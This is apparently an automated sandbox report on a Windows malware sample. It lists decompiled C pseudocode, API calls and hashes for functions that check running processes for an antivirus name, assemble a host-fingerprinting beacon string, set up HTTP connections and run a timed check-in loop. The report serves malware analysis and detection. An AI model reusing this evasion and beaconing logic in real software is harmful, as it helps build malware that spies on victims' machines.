                                                        0x012068d4
                                                        0x012068dc
                                                        0x012068de
                                                        0x012068de
                                                        0x012068e6
                                                        0x012068e8
                                                        0x012068e8
                                                        0x012068e6
                                                        0x012068f2
                                                        0x00000000
                                                        0x012068f2
                                                        0x01206851
                                                        0x00000000

                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01206840
                                                        • GetTickCount.KERNEL32 ref: 01206857
                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 01206877
                                                        • SwitchToThread.KERNEL32(?,00000001), ref: 0120687D
                                                        • _aullrem.NTDLL(?,?,00000013,00000000), ref: 01206899
                                                        • Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 012068B6
                                                        • IsWow64Process.KERNEL32(000002F0,?,?,00000001), ref: 012068D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                        • String ID:
                                                        • API String ID: 3690864001-0
                                                        • Opcode ID: 975e1008c2a80b871dc25c79f09eae27272c7d6177b95d708f819a2b70814052
                                                        • Instruction ID: 726d2ce492b247688a186b1bef701610c594d4fffd1239dacefce4a0ab110e5d
                                                        • Opcode Fuzzy Hash: 975e1008c2a80b871dc25c79f09eae27272c7d6177b95d708f819a2b70814052
                                                        • Instruction Fuzzy Hash: 4D21F9B25103056FD722EFA4E88CA6A77A8B744354F00473DF64AC2183D770C9548B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01202102, Relevance: 7.5, APIs: 5, Instructions: 41processCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01202102() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300); // executed
					while(_t8 != 0) {
						_t9 =  *0x120a2d4; // 0x455d5a8
						_t2 = _t9 + 0x120bde4; // 0x73617661
						if(StrStrIA( &_v264, _t2) != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300); // executed
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                                        0x0120210d
                                                        0x01202112
                                                        0x01202117
                                                        0x0120211b
                                                        0x01202125
                                                        0x01202156
                                                        0x0120212c
                                                        0x01202131
                                                        0x01202147
                                                        0x0120215e
                                                        0x01202149
                                                        0x01202151
                                                        0x00000000
                                                        0x01202151
                                                        0x0120215f
                                                        0x01202160
                                                        0x00000000
                                                        0x01202160
                                                        0x00000000
                                                        0x0120215a
                                                        0x01202166
                                                        0x0120216b

                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01202112
                                                        • Process32First.KERNEL32(00000000,?), ref: 01202125
                                                        • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 0120213F
                                                        • Process32Next.KERNEL32(00000000,?), ref: 01202151
                                                        • CloseHandle.KERNEL32(00000000), ref: 01202160
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: e819ced3c6f821d5a572f6cfbfbc0a77c011fd8efb4f9767a434958ab45669d2
                                                        • Instruction ID: 94ef38c33f1604e8bfabf79a0f2757c3fb895096c365c0f8b75ea4934d34d544
                                                        • Opcode Fuzzy Hash: e819ced3c6f821d5a572f6cfbfbc0a77c011fd8efb4f9767a434958ab45669d2
                                                        • Instruction Fuzzy Hash: 16F09639111135EBD733A6659C4DDEBB6ACDBC5310F0003A3EB49C3183EA649A5A4BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205A5D, Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 21%
                                                        			E01205A5D(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E01203FC1(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E012013CC(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E01203FC1(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x7029f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E012013CC(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E01203FC1(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x120a2d4; // 0x455d5a8
										_t21 = _t45 + 0x120b76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E012013CC(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                                                        0x01205a5d
                                                        0x01205a6c
                                                        0x01205a72
                                                        0x01205ba8
                                                        0x01205ba8
                                                        0x01205a78
                                                        0x01205a78
                                                        0x01205a7e
                                                        0x01205a80
                                                        0x01205a8e
                                                        0x01205a89
                                                        0x01205a89
                                                        0x01205a89
                                                        0x01205a9c
                                                        0x01205aa3
                                                        0x01205aa6
                                                        0x01205aae
                                                        0x00000000
                                                        0x01205ab4
                                                        0x01205ab6
                                                        0x01205abd
                                                        0x01205ac0
                                                        0x00000000
                                                        0x01205ac6
                                                        0x01205ac9
                                                        0x01205acf
                                                        0x01205ae6
                                                        0x01205aef
                                                        0x01205af8
                                                        0x01205afb
                                                        0x01205b03
                                                        0x00000000
                                                        0x01205b09
                                                        0x01205b11
                                                        0x01205b14
                                                        0x01205b1d
                                                        0x01205b20
                                                        0x00000000
                                                        0x01205b26
                                                        0x01205b29
                                                        0x01205b34
                                                        0x01205b34
                                                        0x01205b3e
                                                        0x01205b47
                                                        0x01205b4a
                                                        0x01205b4f
                                                        0x01205b54
                                                        0x00000000
                                                        0x01205b56
                                                        0x01205b61
                                                        0x01205b68
                                                        0x01205b70
                                                        0x01205b72
                                                        0x01205b80
                                                        0x01205b80
                                                        0x01205b82
                                                        0x01205b87
                                                        0x01205b88
                                                        0x01205b8a
                                                        0x01205b91
                                                        0x00000000
                                                        0x01205b93
                                                        0x01205b93
                                                        0x01205b98
                                                        0x01205b99
                                                        0x01205b9b
                                                        0x01205ba2
                                                        0x00000000
                                                        0x01205ba4
                                                        0x01205ba4
                                                        0x01205ba4
                                                        0x01205ba2
                                                        0x01205b91
                                                        0x01205b54
                                                        0x01205b20
                                                        0x01205ad1
                                                        0x01205adc
                                                        0x01205ae0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01205ae0
                                                        0x01205acf
                                                        0x01205ac0
                                                        0x01205aae
                                                        0x01205bb1

                                                        APIs
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,0120135B,74B481D0,00000000,05769698,?,?,012030D3,?,05769698,0000EA60), ref: 01205A78
                                                        • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,0120135B,74B481D0,00000000,05769698,?,?,012030D3,?,05769698,0000EA60), ref: 01205BA8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                        • String ID:
                                                        • API String ID: 4097109750-0
                                                        • Opcode ID: fc9d3fca0c1421ea7e8cca873a410c366f0dec3af3767d2933c1c7666aef2ce4
                                                        • Instruction ID: 1f16b6c874f5ada4a366435b332d4da90eec4f47d17d3e25c9f49d8f14576673
                                                        • Opcode Fuzzy Hash: fc9d3fca0c1421ea7e8cca873a410c366f0dec3af3767d2933c1c7666aef2ce4
                                                        • Instruction Fuzzy Hash: 6841707151060ABFEF329F64CC89E6A7BB9EF04740F004629B745964D6E770EA84DF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012048C2, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E012048C2(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x120a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x120a018; // 0x4ef75f3d
					asm("bswap eax");
					_t32 =  *0x120a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x120a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x120a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x120a2d4; // 0x455d5a8
					_t2 = _t35 + 0x120b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0x120a02c,  *0x120a004, _t110);
					_t38 = E01206A9F();
					_t39 =  *0x120a2d4; // 0x455d5a8
					_t3 = _t39 + 0x120b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x120a2d4; // 0x455d5a8
						_t7 = _t92 + 0x120b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E01202C60(_t99);
					_t44 =  *0x120a2d4; // 0x455d5a8
					_t9 = _t44 + 0x120b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x120a2d4; // 0x455d5a8
					_t11 = _t48 + 0x120b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x120a32c; // 0x57695b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x120a2d4; // 0x455d5a8
						_t13 = _t88 + 0x120b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x120a37c; // 0x5769630
					_a28 = E01203A66(0x120a00a, _t105 + 4);
					_t55 =  *0x120a31c; // 0x57695e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x120a2d4; // 0x455d5a8
						_t16 = _t84 + 0x120b8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x120a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x120a2d4; // 0x455d5a8
						_t18 = _t81 + 0x120b8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x120a290, _t107, 0x800);
						if(_t98 != _t107) {
							E01202C46(GetTickCount());
							_t62 =  *0x120a37c; // 0x5769630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x120a37c; // 0x5769630
							__imp__(_t66 + 0x40);
							_t68 =  *0x120a37c; // 0x5769630
							_t69 = E01207156(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x12092ac);
								_push(_t115);
								_t108 = E01205C8D();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E01203097(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E01203546();
									}
									HeapFree( *0x120a290, 0, _v24);
								}
								HeapFree( *0x120a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x120a290, _t107, _t98);
						}
						HeapFree( *0x120a290, _t107, _a20);
					}
					RtlFreeHeap( *0x120a290, _t107, _t117); // executed
				}
				return _v16;
			}






















































                                                        0x012048c2
                                                        0x012048d6
                                                        0x012048d8
                                                        0x012048e6
                                                        0x012048ea
                                                        0x012048f2
                                                        0x012048fa
                                                        0x012048fa
                                                        0x012048fc
                                                        0x01204908
                                                        0x01204917
                                                        0x0120491c
                                                        0x0120491f
                                                        0x01204924
                                                        0x01204927
                                                        0x0120492c
                                                        0x0120492f
                                                        0x0120493b
                                                        0x01204948
                                                        0x0120494a
                                                        0x01204950
                                                        0x01204955
                                                        0x01204960
                                                        0x01204962
                                                        0x01204965
                                                        0x0120496b
                                                        0x0120496d
                                                        0x01204976
                                                        0x01204981
                                                        0x01204983
                                                        0x01204986
                                                        0x01204986
                                                        0x01204988
                                                        0x0120498f
                                                        0x01204994
                                                        0x012049a1
                                                        0x012049a3
                                                        0x012049a8
                                                        0x012049b6
                                                        0x012049b8
                                                        0x012049bd
                                                        0x012049c2
                                                        0x012049c5
                                                        0x012049ca
                                                        0x012049d5
                                                        0x012049d7
                                                        0x012049da
                                                        0x012049da
                                                        0x012049dc
                                                        0x012049ef
                                                        0x012049f3
                                                        0x012049f8
                                                        0x012049fc
                                                        0x012049ff
                                                        0x01204a04
                                                        0x01204a0f
                                                        0x01204a11
                                                        0x01204a14
                                                        0x01204a14
                                                        0x01204a16
                                                        0x01204a1d
                                                        0x01204a20
                                                        0x01204a25
                                                        0x01204a2f
                                                        0x01204a31
                                                        0x01204a38
                                                        0x01204a50
                                                        0x01204a54
                                                        0x01204a60
                                                        0x01204a65
                                                        0x01204a6e
                                                        0x01204a7f
                                                        0x01204a83
                                                        0x01204a8c
                                                        0x01204a92
                                                        0x01204a9a
                                                        0x01204a9f
                                                        0x01204aac
                                                        0x01204ab2
                                                        0x01204aba
                                                        0x01204ac0
                                                        0x01204ac6
                                                        0x01204aca
                                                        0x01204ace
                                                        0x01204ad4
                                                        0x01204ad8
                                                        0x01204adf
                                                        0x01204ae6
                                                        0x01204aea
                                                        0x01204af5
                                                        0x01204afc
                                                        0x01204b00
                                                        0x01204b09
                                                        0x01204b09
                                                        0x01204b1a
                                                        0x01204b1a
                                                        0x01204b29
                                                        0x01204b2f
                                                        0x01204b2f
                                                        0x01204b39
                                                        0x01204b39
                                                        0x01204b4a
                                                        0x01204b4a
                                                        0x01204b58
                                                        0x01204b58
                                                        0x01204b68

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 012048E0
                                                        • GetTickCount.KERNEL32 ref: 012048F4
                                                        • wsprintfA.USER32 ref: 01204943
                                                        • wsprintfA.USER32 ref: 01204960
                                                        • wsprintfA.USER32 ref: 01204981
                                                        • wsprintfA.USER32 ref: 0120499F
                                                        • wsprintfA.USER32 ref: 012049B4
                                                        • wsprintfA.USER32 ref: 012049D5
                                                        • wsprintfA.USER32 ref: 01204A0F
                                                        • wsprintfA.USER32 ref: 01204A2F
                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01204A4A
                                                        • GetTickCount.KERNEL32 ref: 01204A5A
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 01204A6E
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 01204A8C
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207181
                                                          • Part of subcall function 01207156: lstrlen.KERNEL32(00000000,?,00000000,01204A9F,00000000,05769630), ref: 01207189
                                                          • Part of subcall function 01207156: strcpy.NTDLL ref: 012071A0
                                                          • Part of subcall function 01207156: lstrcat.KERNEL32(00000000,00000000), ref: 012071AB
                                                          • Part of subcall function 01207156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 012071C8
                                                        • StrTrimA.SHLWAPI(00000000,012092AC,00000000,05769630), ref: 01204ABA
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                          • Part of subcall function 01205C8D: lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205C8D: lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                          • Part of subcall function 01205C8D: lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        • lstrcpy.KERNEL32(00000000,?), ref: 01204AD8
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01204AE6
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 01204AEA
                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01204B1A
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01204B29
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,05769630), ref: 01204B39
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01204B4A
                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 01204B58
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                        • String ID:
                                                        • API String ID: 1837416118-0
                                                        • Opcode ID: b451fdd8e23fc292b5d3391a38f086e2fe9c6d860675cfc569e09a5a6be91015
                                                        • Instruction ID: 25c4ebec4af610d412dc71c8f23f9e1ec59b13fe08384b49888a11898c2ffd80
                                                        • Opcode Fuzzy Hash: b451fdd8e23fc292b5d3391a38f086e2fe9c6d860675cfc569e09a5a6be91015
                                                        • Instruction Fuzzy Hash: 2E717B72500215AFD733EB68FC8CE5A7BEDFB88300B050725FA49C3257E636A9048B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012050A3, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E012050A3(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x120a298);
					_v20 = 0;
					_v16 = 0;
					L01207DDC();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x120a2c4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x120a2a4 = 5;
						} else {
							_t69 = E01205335(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x120a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E01205242( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E012074CB(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x120a29c);
							goto L21;
						} else {
							__eflags =  *0x120a2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E01203546();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x120a2a0);
								L21:
								L01207DDC();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x120a290, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                        0x012050a3
                                                        0x012050b5
                                                        0x012050b8
                                                        0x012050c4
                                                        0x012050cc
                                                        0x012050cf
                                                        0x01205235
                                                        0x012050d5
                                                        0x012050d5
                                                        0x012050d7
                                                        0x012050dc
                                                        0x012050dd
                                                        0x012050e3
                                                        0x012050e6
                                                        0x012050e9
                                                        0x012050f7
                                                        0x01205102
                                                        0x01205105
                                                        0x01205107
                                                        0x01205114
                                                        0x0120511e
                                                        0x01205122
                                                        0x01205125
                                                        0x0120512a
                                                        0x01205135
                                                        0x01205135
                                                        0x0120512c
                                                        0x0120512c
                                                        0x01205133
                                                        0x00000000
                                                        0x00000000
                                                        0x01205133
                                                        0x0120513f
                                                        0x00000000
                                                        0x01205142
                                                        0x01205146
                                                        0x01205151
                                                        0x01205151
                                                        0x01205158
                                                        0x0120515d
                                                        0x01205164
                                                        0x0120516d
                                                        0x01205173
                                                        0x01205176
                                                        0x0120517d
                                                        0x01205180
                                                        0x00000000
                                                        0x00000000
                                                        0x01205182
                                                        0x01205185
                                                        0x01205188
                                                        0x0120518b
                                                        0x00000000
                                                        0x0120518d
                                                        0x01205197
                                                        0x0120519c
                                                        0x0120519c
                                                        0x00000000
                                                        0x012051ca
                                                        0x012051ca
                                                        0x012051cf
                                                        0x012051ee
                                                        0x012051f0
                                                        0x012051f5
                                                        0x012051f6
                                                        0x00000000
                                                        0x012051d1
                                                        0x012051d1
                                                        0x012051d7
                                                        0x00000000
                                                        0x012051d9
                                                        0x012051d9
                                                        0x012051de
                                                        0x012051e0
                                                        0x012051e5
                                                        0x012051e6
                                                        0x012051fc
                                                        0x012051fc
                                                        0x01205204
                                                        0x0120520f
                                                        0x01205212
                                                        0x0120521d
                                                        0x0120521f
                                                        0x01205221
                                                        0x01205224
                                                        0x00000000
                                                        0x0120522a
                                                        0x00000000
                                                        0x0120522a
                                                        0x01205224
                                                        0x012051d7
                                                        0x00000000
                                                        0x012051cf
                                                        0x0120519f
                                                        0x012051a1
                                                        0x012051a4
                                                        0x012051a5
                                                        0x012051a5
                                                        0x012051a9
                                                        0x012051b3
                                                        0x012051b3
                                                        0x012051b9
                                                        0x012051bc
                                                        0x012051bc
                                                        0x012051c2
                                                        0x012051c2
                                                        0x0120523f
                                                        0x00000000

                                                        APIs
                                                        • memset.NTDLL ref: 012050B8
                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012050C4
                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 012050E9
                                                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01205105
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0120511E
                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 012051B3
                                                        • CloseHandle.KERNEL32(?), ref: 012051C2
                                                        • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012051FC
                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,01204579), ref: 01205212
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0120521D
                                                          • Part of subcall function 01205335: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05769318,00000000,?,74B5F710,00000000,74B5F730), ref: 01205384
